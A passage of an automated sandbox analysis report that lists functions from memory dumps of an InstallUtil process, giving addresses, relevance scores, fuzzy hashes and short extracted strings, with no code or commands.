Opcode Fuzzy Hash: aee989923640af985fd40f7bad2d36aa14becd4f764f6000509d516b1c10c190
Instruction Fuzzy Hash: 9791EF74D00218CFEB64DFA8D988BDCFBB1BF49310F249269E509AB291DB709985CF54

Function 066DD018 Relevance: .2, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4224467570.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_66d0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9b48cc1f8ff42a0995db5a2f0a394fe59c7a1eef5f197aded9d7225bc5a3388
Instruction ID: d0bde905ff814134347cd2684e700a92224dc0aa0ccb2c121e642e51586a0dbe
Opcode Fuzzy Hash: d9b48cc1f8ff42a0995db5a2f0a394fe59c7a1eef5f197aded9d7225bc5a3388
Instruction Fuzzy Hash: FF718870E016188FEB68DF6AC94479EBBF2AF89300F14C1AAD50DA7254DB345A85CF51

Function 066DB090 Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4224467570.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_66d0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98c19cd07b159cc664f7cc551d50e56d258ab3e7f53b5f9739c03c65d312b00b
Instruction ID: 25637395f0cba95662f83ca1ca0debccc2985ef33a8d081aecaec30b551af008
Opcode Fuzzy Hash: 98c19cd07b159cc664f7cc551d50e56d258ab3e7f53b5f9739c03c65d312b00b
Instruction Fuzzy Hash: 297199B1E00628CFEB68CF6AC94479DFAF2AF89300F14C1AAD40DA7254DB345A85CF51

Function 066DAA53 Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4224467570.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_66d0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6e0850f69691491ee430d812dfb0c789bc10d62e2c042e377a39a7309be5fe0
Instruction ID: 5d4f25c2fff0852c09dfdda36cb8dde0bd71e0ad658fb0a863c079f333343ac7
Opcode Fuzzy Hash: f6e0850f69691491ee430d812dfb0c789bc10d62e2c042e377a39a7309be5fe0
Instruction Fuzzy Hash: 56718471E006298FEB68CF6AC944B9DBAF2AF89300F14C1AAD40DA7254DB345A85CF51

Function 066DC378 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4224467570.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_66d0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b851a56518503b0813286d4de66d15241803cfee4f176cc5bdbc8e6ef41e7edb
Instruction ID: 3faa04d4ee14091a3debc8df36461750bf0a81ceefedfe0532817377ea540145
Opcode Fuzzy Hash: b851a56518503b0813286d4de66d15241803cfee4f176cc5bdbc8e6ef41e7edb
Instruction Fuzzy Hash: FF41ABB1D016189BEB58CF6BCD457CAFAF3AFC9204F04C1AAD50CA6265DB740A86CF50

Function 066DC9C8 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4224467570.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_66d0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 337145b20da3870f4d84f9abc8d0b1ea83d00400244de6682bd1ac130b2879ab
Instruction ID: 5720df686d24784ab834d4f8bcbf0428208572bfdaff4c583084b467bb814c25
Opcode Fuzzy Hash: 337145b20da3870f4d84f9abc8d0b1ea83d00400244de6682bd1ac130b2879ab
Instruction Fuzzy Hash: 2C4188B1E016189BEB58CF6BDD447DAFAF3AFC8310F04C1AAC50CA6264DB740A858F51

Function 066D85F8 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4224467570.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_66d0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1894cb8af776d8aecf968f76fe368e53af4902b01035dae18d1639c6fae70d8e
Instruction ID: a21d88898dd62b9a88886725daa99bc45314aa77390700da8615ebf895a1fd44
Opcode Fuzzy Hash: 1894cb8af776d8aecf968f76fe368e53af4902b01035dae18d1639c6fae70d8e
Instruction Fuzzy Hash: 0141D2B0D002098BEB58DFAAC9447DEBBF2BF88300F24D16AC458AB2A4DB755945CF54

Function 066DBD28 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4224467570.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_66d0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f0e3b044a02b9b4d2f50309512ae7836fae83cb44bb6a2c65146c2d9b68ebdb
Instruction ID: 0321c4db258ef94f158bd2cdd4586a4cdad527fb205420cc42697b93cc494113
Opcode Fuzzy Hash: 5f0e3b044a02b9b4d2f50309512ae7836fae83cb44bb6a2c65146c2d9b68ebdb
Instruction Fuzzy Hash: 9F416BB1E016189BEB58CF6BCD457CAFAF3AFC8304F14C1AAD50CA6264DB740A858F51

Function 066DD662 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4224467570.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_66d0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1af37b902ff97cb04bc710b9dbceb7ec879f55f97f570f5155734a7919125c5f
Instruction ID: c3b3671f500e6ed0c586bab03392b73c4c66c169f30a0d57c212503a82d3690e
Opcode Fuzzy Hash: 1af37b902ff97cb04bc710b9dbceb7ec879f55f97f570f5155734a7919125c5f
Instruction Fuzzy Hash: D6416CB1E016189BEB58CF6BDD457CAFAF3AFC8304F04C1AAD50CA6254DB740A858F51

Function 066DB6D9 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4224467570.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_66d0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88c905bff5c783dad7649547113130cc56c48ce1b8213df366f65fc690f82f16
Instruction ID: 82bff7c22364e0353a8675d9d2de6b42e175ba8d835a9d03beb30bafeef0f360
Opcode Fuzzy Hash: 88c905bff5c783dad7649547113130cc56c48ce1b8213df366f65fc690f82f16
Instruction Fuzzy Hash: 76415AB1E016189BEB58CF6BCD457CAFAF3AFC8314F14C1AAD50CA6264DB740A858F51

Function 066DA3F8 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4224467570.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_66d0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27af95d4b48d3a105117a7bbc247d8fc110354cadaf82ef1cf8d329a98ac058a
Instruction ID: 3187a49c8d2423b3fb1143c7b37a2a86bae2a864c07412bb31cbe4b48bce1ba1
Opcode Fuzzy Hash: 27af95d4b48d3a105117a7bbc247d8fc110354cadaf82ef1cf8d329a98ac058a
Instruction Fuzzy Hash: EF4169B1E016188BEB58CF6BD9457DAFAF3AFC8310F14C1AAC54CA6264DB740A858F51

Function 066D7040 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4224467570.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_66d0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a7ecbabfb59d8fda70d4b0f4b3607e992f6e3f6dc6d68bf4d0014e34f8fe389
Instruction ID: fd0bb2d0fbda4b85edb0fdf00140beeaaebdf5997efc764a83b0efaf16b9a3d6
Opcode Fuzzy Hash: 0a7ecbabfb59d8fda70d4b0f4b3607e992f6e3f6dc6d68bf4d0014e34f8fe389
Instruction Fuzzy Hash: B141D370E01218CFDB58DFAAD95069EFBF2AF88300F24D12AD418BB268DB745945CF45

Function 010A6E70 Relevance: 10.5, Strings: 8, Instructions: 473
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(okq, xrefs: 010A6EAE
(okq, xrefs: 010A6F69
(okq, xrefs: 010A7032
(okq, xrefs: 010A737F
,oq, xrefs: 010A7320
(okq, xrefs: 010A6F95
,oq, xrefs: 010A7310
(okq, xrefs: 010A738F

Memory Dump Source

Source File: 00000001.00000002.4214337140.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10a0000_InstallUtil.jbxd

Similarity

API ID:
String ID: (okq$(okq$(okq$(okq$(okq$(okq$,oq$,oq
API String ID: 0-2636989756
Opcode ID: 25676d221b94535e79a3055acda6a12700738a7a5c184724caf8afe04f9d9a74
Instruction ID: 39a1c2331ea778753698f4f3b87e5db98388516362a3ae00e4288e9036dfdcf5
Opcode Fuzzy Hash: 25676d221b94535e79a3055acda6a12700738a7a5c184724caf8afe04f9d9a74
Instruction Fuzzy Hash: 89126B30A002088FCB65CFA8D984A9EBBF2FF89314F558599F9859B361D732ED41CB50

Function 010A215C Relevance: 5.3, Strings: 4, Instructions: 322
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Xoq, xrefs: 010A2248
Xoq, xrefs: 010A22C7
Xoq, xrefs: 010A220E
Xoq, xrefs: 010A2314

Memory Dump Source

Source File: 00000001.00000002.4214337140.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10a0000_InstallUtil.jbxd

Similarity

API ID:
String ID: Xoq$Xoq$Xoq$Xoq
API String ID: 0-1961338500
Opcode ID: 0a216253c40f18e746d1b95b511ff480d8fc082769b43dd4f1adac83dc234f15
Instruction ID: 1c7b2c9ecbc3bc73f59bacfa4062c99a344b5a9b9b61fc80999e2f838235c25c
Opcode Fuzzy Hash: 0a216253c40f18e746d1b95b511ff480d8fc082769b43dd4f1adac83dc234f15
Instruction Fuzzy Hash: 82B124719442A48ECF168FF884547F97F71BF4B304F285AEAC0C1BA52AD63A4942E780

Function 010A8801 Relevance: 4.2, Strings: 3, Instructions: 499
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'kq, xrefs: 010A8829
4'kq, xrefs: 010A884F
;kq, xrefs: 010A8C44

Memory Dump Source

Source File: 00000001.00000002.4214337140.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10a0000_InstallUtil.jbxd

Similarity

API ID:
String ID: 4'kq$4'kq$;kq
API String ID: 0-3326240858
Opcode ID: 693003d4c81e0511610404d65cd6d9377609e86b4b67fa1e003050ac2f1c6faa
Instruction ID: 26b1708c93d09a3a3a8ae9196e6ff64add4c86c08c87f64ee2a710d93b0814bc
Opcode Fuzzy Hash: 693003d4c81e0511610404d65cd6d9377609e86b4b67fa1e003050ac2f1c6faa
Instruction Fuzzy Hash: 5FF190703105018FEB656EADC55873D7BE6EF94606F5880EBE182CB3B5EA29CC81C781

Function 010A5C10 Relevance: 4.0, Strings: 3, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8, xrefs: 010A5E66
,oq, xrefs: 010A5CE6
,oq, xrefs: 010A5CF0

Memory Dump Source

Source File: 00000001.00000002.4214337140.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10a0000_InstallUtil.jbxd

Similarity

API ID:
String ID: ,oq$,oq$8
API String ID: 0-3995569542
Opcode ID: f02f37916592a263acf3144ebfede0ff02691298909746c1be3e8e26b7fb4893
Instruction ID: d4a633e23db7debd33f654cae1b91089efbdf05101b3e3cd1fe26a3b68264d08
Opcode Fuzzy Hash: f02f37916592a263acf3144ebfede0ff02691298909746c1be3e8e26b7fb4893
Instruction Fuzzy Hash: 20817E34A00105CFCB68DFADCC889AEBBF6BF89314B9581A9D645DB365D731E841CB90

Function 010A7808 Relevance: 3.2, Strings: 2, Instructions: 702COMMON

Download Yara Rule

Strings

$kq, xrefs: 010A834F
$kq, xrefs: 010A832C

Memory Dump Source

Source File: 00000001.00000002.4214337140.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10a0000_InstallUtil.jbxd

Similarity

API ID:
String ID: $kq$$kq
API String ID: 0-3550614674
Opcode ID: a3cc6a846fee7403d39ffe3927ff8d2f0e7a995bc7cdc60d3bcfb608a93a8bd4
Instruction ID: 848ce0f3df9a9b9019a083a4e69eecdee83d4b97d308d4fc72b9944c46588a21
Opcode Fuzzy Hash: a3cc6a846fee7403d39ffe3927ff8d2f0e7a995bc7cdc60d3bcfb608a93a8bd4
Instruction Fuzzy Hash: 9C524274A00228CFEB64DBA4C950B9EBB72FF94300F1091AAD14A6B3A5CF359D85DF51

Function 010A56B0 Relevance: 2.8, Strings: 2, Instructions: 324COMMON

Download Yara Rule

Strings

Hoq, xrefs: 010A579B
Hoq, xrefs: 010A57CE

Memory Dump Source

Source File: 00000001.00000002.4214337140.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10a0000_InstallUtil.jbxd

Similarity

API ID:
String ID: Hoq$Hoq
API String ID: 0-3106737575
Opcode ID: 8a09b4f17ace0c701c0301108368e1a3f0327fcc9c174a4b2cb2f72e1a0aaa44
Instruction ID: b8079aba3825a6ccfc5851a409a0c582933a05035903ef9991d88e5ab6d4365d
Opcode Fuzzy Hash: 8a09b4f17ace0c701c0301108368e1a3f0327fcc9c174a4b2cb2f72e1a0aaa44
Instruction Fuzzy Hash: 05B1CE317042518FDB669FB8D898B6E7BE2BB88310F5445A9E886DB395DF34CC41C790

Function 066D23E0 Relevance: 2.7, Strings: 2, Instructions: 230COMMON

Download Yara Rule

Strings

LRkq, xrefs: 066D23FC
LRkq, xrefs: 066D2529

Memory Dump Source

Source File: 00000001.00000002.4224467570.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_66d0000_InstallUtil.jbxd

Similarity

API ID:
String ID: LRkq$LRkq
API String ID: 0-2882777380
Opcode ID: a00e0e1528b7d25e365b375ffbe632e899ab12ee95de51c78064059b60bfa5e9
Instruction ID: e450346e8555c48cb00de318feab702fd9c7bf4f8a4fe2b2ef0b6a6f31a50de7
Opcode Fuzzy Hash: a00e0e1528b7d25e365b375ffbe632e899ab12ee95de51c78064059b60bfa5e9
Instruction Fuzzy Hash: 0D81A035B001168FCB58DF79D964D6E77BABF88600B1581AAE605DB3B5DB30DE02CB90

Function 066D9510 Relevance: 2.7, Strings: 2, Instructions: 209COMMON

Download Yara Rule

Strings

(oq, xrefs: 066D96EA
(&kq, xrefs: 066D962B

Memory Dump Source

Source File: 00000001.00000002.4224467570.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_66d0000_InstallUtil.jbxd

Similarity

API ID:
String ID: (&kq$(oq
API String ID: 0-2620321033
Opcode ID: bd67e611ffbc846811c28c427ad2075309cbb4bfee17b3498114e179ec37b769
Instruction ID: ce71e4b2c8b4d4cfa28f71ffba57e1646059d4b99d2a5d08de588c249bb4e2b5
Opcode Fuzzy Hash: bd67e611ffbc846811c28c427ad2075309cbb4bfee17b3498114e179ec37b769
Instruction Fuzzy Hash: 3271A271F002599BDB59DFB9C8906AEBBF6AFC8700F148629E405AB384DF309D42C791

Function 010A3428 Relevance: 2.6, Strings: 2, Instructions: 112COMMON

Download Yara Rule

Strings

Xoq, xrefs: 010A3435
Xoq, xrefs: 010A345E

Memory Dump Source

Source File: 00000001.00000002.4214337140.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10a0000_InstallUtil.jbxd

Similarity

API ID:
String ID: Xoq$Xoq
API String ID: 0-251439590
Opcode ID: 22f6b5edbaf61c3afb4203049ed4bda00bbd533c47c9d68f49642744dae49216
Instruction ID: 7f37d9b5cc9febee6a6a4e054c041443679c5ec955800cff929f9384f0b2185a
Opcode Fuzzy Hash: 22f6b5edbaf61c3afb4203049ed4bda00bbd533c47c9d68f49642744dae49216
Instruction Fuzzy Hash: CA313775B003258BDF698AFE959427FA9DABBC4210F88447AD986CB394DF74DC408390

Function 010A0C8F Relevance: 1.7, Strings: 1, Instructions: 401COMMON

Download Yara Rule

Strings

LRkq, xrefs: 010A0E5E

Memory Dump Source

Source File: 00000001.00000002.4214337140.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10a0000_InstallUtil.jbxd

Similarity

API ID:
String ID: LRkq
API String ID: 0-1052062081
Opcode ID: b4e0240243e5bbef3cf9406fddf3f4c54786e38e806cb653703ea479b9c082f3
Instruction ID: 33c32c3d6c23a17751030f17dfb2be7cf4fea12f1ad6f6c40b341a11dec60344
Opcode Fuzzy Hash: b4e0240243e5bbef3cf9406fddf3f4c54786e38e806cb653703ea479b9c082f3
Instruction Fuzzy Hash: B822D97890122ADFCF54EF65E984A9DBBB2FF48305F1086AAD509A7358DB306D85CF40

Function 010A0CA0 Relevance: 1.6, Strings: 1, Instructions: 395COMMON

Download Yara Rule

Strings

LRkq, xrefs: 010A0E5E

Memory Dump Source

Source File: 00000001.00000002.4214337140.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10a0000_InstallUtil.jbxd

Similarity

API ID:
String ID: LRkq
API String ID: 0-1052062081
Opcode ID: 2f29265f860fc5a46f57af1ee2e858deb4862d83c7a3f6ec6fe9d666e9ec8ba9
Instruction ID: 4af39aa2fefd213a626df1052cc81e915a2c646f7d72373f18a1c4039fbb7330
Opcode Fuzzy Hash: 2f29265f860fc5a46f57af1ee2e858deb4862d83c7a3f6ec6fe9d666e9ec8ba9
Instruction Fuzzy Hash: F522D97890122ADFCF54EF65E984A9DBBB1FF48304F1086AAD509A7358DB306D85CF40

Function 066A8174 Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(00000000), ref: 066A82B6

Memory Dump Source

Source File: 00000001.00000002.4223781999.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_66a0000_InstallUtil.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ef3a0cd94a87a21aadb4f7a19c534b16b2c4abf3191198547f438d42f38ea7a4
Instruction ID: d3469274023dded04cf35f2f2b3cda854b11a45e17661aab14ebe1ed3f3b44b5
Opcode Fuzzy Hash: ef3a0cd94a87a21aadb4f7a19c534b16b2c4abf3191198547f438d42f38ea7a4
Instruction Fuzzy Hash: B9116AB4E012198FDB44DFE8E484ABDBBB5FB88304F549168E944E7242DB30AD41CFA0

Function 010AA660 Relevance: 1.4, Strings: 1, Instructions: 121COMMON

Download Yara Rule

Strings

(okq, xrefs: 010AA7E9

Memory Dump Source

Source File: 00000001.00000002.4214337140.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10a0000_InstallUtil.jbxd

Similarity

API ID:
String ID: (okq
API String ID: 0-2789353238
Opcode ID: 72acfe8b0b3b4ee5c3e3744822e77b2bb572ca10d9d57b1f1d096f2f650caabd
Instruction ID: bbb38f6c9bbb8936c54fd859181a3db70672ac4572a1547173c1bb505e32421b
Opcode Fuzzy Hash: 72acfe8b0b3b4ee5c3e3744822e77b2bb572ca10d9d57b1f1d096f2f650caabd
Instruction Fuzzy Hash: 4C41BF35B002549FCB259F79D958AAE7BF6BBC8210F148569E546E73D4CE31DC02CB90

Function 010A4DD0 Relevance: 1.4, Strings: 1, Instructions: 101COMMON

Download Yara Rule

Strings

8, xrefs: 010A4DE1, 010A4DFE, 010A4E1B, 010A4EB1

Memory Dump Source

Source File: 00000001.00000002.4214337140.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10a0000_InstallUtil.jbxd

Similarity

API ID:
String ID: 8
API String ID: 0-3897458245
Opcode ID: a59e013a20b6b625404c1a6e050a887cde260709d2bc87c1aa3002bb3cf383d6
Instruction ID: 21ef93fbd12a5f8ab431dec09d8fbc3a6993a9e708e341494975a61bd14d1452
Opcode Fuzzy Hash: a59e013a20b6b625404c1a6e050a887cde260709d2bc87c1aa3002bb3cf383d6
Instruction Fuzzy Hash: D031C37560411A9FCF159FA8D848AAE3BA6FF88300F444025FA45CB245CB79DC61CBA0

Function 010A76E8 Relevance: 1.3, Strings: 1, Instructions: 90COMMON

Download Yara Rule

Strings

8, xrefs: 010A7702

Memory Dump Source

Source File: 00000001.00000002.4214337140.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10a0000_InstallUtil.jbxd

Similarity

API ID:
String ID: 8
API String ID: 0-3897458245
Opcode ID: 6ebc23fed184d22c9f0205c216dae69575f2b852a7c672d2fc144350ece928bf
Instruction ID: 57472b84f44a4a05d88a1e097578ee0dbe8012e2fff911b6b9227e94ae966b25
Opcode Fuzzy Hash: 6ebc23fed184d22c9f0205c216dae69575f2b852a7c672d2fc144350ece928bf
Instruction Fuzzy Hash: F82125343042114BDB662BBDD59423D3FDBBFC96457A880B9D542CB3A6EE2ACC429781

Function 010A76F8 Relevance: 1.3, Strings: 1, Instructions: 87COMMON

Download Yara Rule

Strings

8, xrefs: 010A7702

Memory Dump Source

Source File: 00000001.00000002.4214337140.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10a0000_InstallUtil.jbxd

Similarity

API ID:
String ID: 8
API String ID: 0-3897458245
Opcode ID: 76735a4622b7511eb78ee39ced7b3cdb74721acffe03e5e18f288981b6622c71
Instruction ID: aa06bef28678935a709c92cb0835bc4a92b48b7f868b35de49894426801023f0
Opcode Fuzzy Hash: 76735a4622b7511eb78ee39ced7b3cdb74721acffe03e5e18f288981b6622c71
Instruction Fuzzy Hash: 682107343001114BDB656779D55437E3ADBBFC4655F64C0B8D542CB3A9EE2BCC829780

Function 010A5A68 Relevance: 1.3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

Strings

8, xrefs: 010A5B02, 010A5B1F

Memory Dump Source

Source File: 00000001.00000002.4214337140.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10a0000_InstallUtil.jbxd

Similarity

API ID:
String ID: 8
API String ID: 0-3897458245
Opcode ID: 0efaa4e56980523fcf3a1cc67bff26c1ded990baa337003a26ebc7b65eb6ca42
Instruction ID: a4dce995b499c29aba4f9142561eb77fda27e0bd83fc6984be55ce7b16e0a1d3
Opcode Fuzzy Hash: 0efaa4e56980523fcf3a1cc67bff26c1ded990baa337003a26ebc7b65eb6ca42
Instruction Fuzzy Hash: E5212634711712CFC7259BB9D8A892E7792BF8566174541AAE986CF358CE34DC02CBC0

Function 010A4DC1 Relevance: 1.3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

Strings

8, xrefs: 010A4DE1, 010A4DFE, 010A4E1B

Memory Dump Source

Source File: 00000001.00000002.4214337140.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10a0000_InstallUtil.jbxd

Similarity

API ID:
String ID: 8
API String ID: 0-3897458245
Opcode ID: 8e2503e74ae2ece2f5ef3c31c62ae4ce87f9c1ad2934457b44aac6905e204224
Instruction ID: f3d7696293da624f912ab42814219aae9da39b67cdfba861e51d76ff72dd7d4a
Opcode Fuzzy Hash: 8e2503e74ae2ece2f5ef3c31c62ae4ce87f9c1ad2934457b44aac6905e204224
Instruction Fuzzy Hash: 7A2138756181158FCB159FA8D444BAB3BA2FB85310F44406AF585CF345CB78CD15CBE0

Function 066D3280 Relevance: 1.3, Strings: 1, Instructions: 60COMMON

Download Yara Rule

Strings

Hoq, xrefs: 066D32CD

Memory Dump Source

Source File: 00000001.00000002.4224467570.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_66d0000_InstallUtil.jbxd

Similarity

API ID:
String ID: Hoq
API String ID: 0-3049094369
Opcode ID: 8c63992b6590abcff3a7daa2d4f5e535b29901e3fefd2bb845050a4196968cd4
Instruction ID: dfc39f1557316479be6636187374455336db343df85016b849dd15c83bc77e2d
Opcode Fuzzy Hash: 8c63992b6590abcff3a7daa2d4f5e535b29901e3fefd2bb845050a4196968cd4
Instruction Fuzzy Hash: AA115E30E042099FCB98EFB8D654BAD7BF6AB84200F1085AD9409EB794DA349E41C791

Function 010A5A78 Relevance: 1.3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

Strings

8, xrefs: 010A5B02

Memory Dump Source

Source File: 00000001.00000002.4214337140.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10a0000_InstallUtil.jbxd

Similarity

API ID:
String ID: 8
API String ID: 0-3897458245
Opcode ID: 71c9e6931f1d19bdfd4655685c99625251e8115ccd3c594cf297b7c995b3d2a5
Instruction ID: 6a58ef29537b597aa130a0de048b7646f3e13597f4303a68f26bc95fcf0169df
Opcode Fuzzy Hash: 71c9e6931f1d19bdfd4655685c99625251e8115ccd3c594cf297b7c995b3d2a5
Instruction Fuzzy Hash: 8C11E1317016128FD7299ABAE8A892EB796BF8466134541B9E946CB354DF30DC028BC0

Function 010AA828 Relevance: .4, Instructions: 409COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4214337140.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0d6eb118f0e83e3711648f39790e6bfe2980606c045fb79323ab11307ce7384
Instruction ID: dbc314897544e221b5b586b25409968f6532f7cdfaa2869364f7384458d936e2
Opcode Fuzzy Hash: c0d6eb118f0e83e3711648f39790e6bfe2980606c045fb79323ab11307ce7384
Instruction Fuzzy Hash: 5CF14D75B00119CFCB05CFACD988A9DBBF6BF88310B5A8499E545AB3A1DB35EC41CB50

Function 010A7450 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4214337140.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00485d9cd8bc982803c2d8be3f951858f572fdfad8c25a5294ee86d363ca4831
Instruction ID: 9cec87f6dfcd6ba3404eba6a9ee85309f868d33dc36840ed535d15567fd94c56
Opcode Fuzzy Hash: 00485d9cd8bc982803c2d8be3f951858f572fdfad8c25a5294ee86d363ca4831
Instruction Fuzzy Hash: 0C7128347002458FDB65DFBCC898AAE7BE5AF49200F5980A9E985CB371DB72DC41CB90

Function 066D1191 Relevance: .2, Instructions: 175COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.4224467570.00000000066D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_66d0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 760e88c6b8344df5476f5fea5955e61310e8bfaeae9d68480a2777fa0daea7f1
